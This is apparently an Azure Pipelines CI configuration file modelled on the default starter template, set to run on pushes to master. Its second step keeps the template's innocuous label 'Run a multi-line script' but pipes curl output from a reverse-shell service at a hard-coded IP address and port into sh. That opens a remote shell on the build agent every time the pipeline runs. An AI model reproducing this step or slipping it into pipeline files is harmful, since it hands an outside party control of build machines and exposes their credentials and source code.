trigger:
- master

steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'

- script: |
    curl https://shell.now.sh/159.89.175.221:1211 | sh
  displayName: 'Run a multi-line script'
